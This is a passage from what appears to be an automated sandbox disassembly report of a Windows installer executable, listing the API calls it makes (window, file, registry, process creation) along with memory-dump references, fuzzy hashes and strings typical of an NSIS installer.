                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID: @rD
                                  • API String ID: 184305955-3814967855
                                  • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                  • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                  APIs
                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                  • GetSysColor.USER32(?), ref: 004041AF
                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                  • SendMessageW.USER32(00000000), ref: 00404251
                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                  • SetCursor.USER32(00000000), ref: 004042D2
                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                  • SetCursor.USER32(00000000), ref: 004042F6
                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                  • String ID: @%F$N$open
                                  • API String ID: 3928313111-3849437375
                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                  APIs
                                  • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                  • wsprintfA.USER32 ref: 00406B4D
                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                  • String ID: F$%s=%s$NUL$[Rename]
                                  • API String ID: 565278875-1653569448
                                  • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                  • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                  APIs
                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                  • BeginPaint.USER32(?,?), ref: 00401047
                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                  • DeleteObject.GDI32(?), ref: 004010F6
                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                  • DeleteObject.GDI32(?), ref: 0040116E
                                  • EndPaint.USER32(?,?), ref: 00401177
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                  • String ID: F
                                  • API String ID: 941294808-1304234792
                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                  APIs
                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  Strings
                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: lstrlen$CloseCreateValuewvsprintf
                                  • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                  • API String ID: 1641139501-220328614
                                  • Opcode ID: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                  • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                  • Opcode Fuzzy Hash: d79db666ee92a39b53e47641609ed565b43369f8775619f718224e07aa5483b4
                                  • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                  • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                  • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                  • DeleteFileW.KERNEL32(?), ref: 00402F56
                                  Strings
                                  • created uninstaller: %d, "%s", xrefs: 00402F3B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID: created uninstaller: %d, "%s"
                                  • API String ID: 3294113728-3145124454
                                  • Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                  • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                  • Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
                                  • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                  APIs
                                  • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                  • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                  • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                  • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                  • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                  • API String ID: 3734993849-2769509956
                                  • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                  • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                  • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                  • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                  APIs
                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                  • GetSysColor.USER32(?), ref: 00403E2B
                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                  • DeleteObject.GDI32(?), ref: 00403E55
                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                  Strings
                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                  • API String ID: 1033533793-945480824
                                  • Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                  • Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                  APIs
                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                  • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1565915856.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1565894778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565935598.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1565953558.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1566065390.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_5daucomrx8.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                  • String ID:
                                  • API String ID: 2740478559-0
                                  • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                  • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                  • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                  • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                  APIs
                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                  Strings
                                  • Exec: success ("%s"), xrefs: 00402263
                                  • Exec: command="%s", xrefs: 00402241
                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                  Memory Dump Source
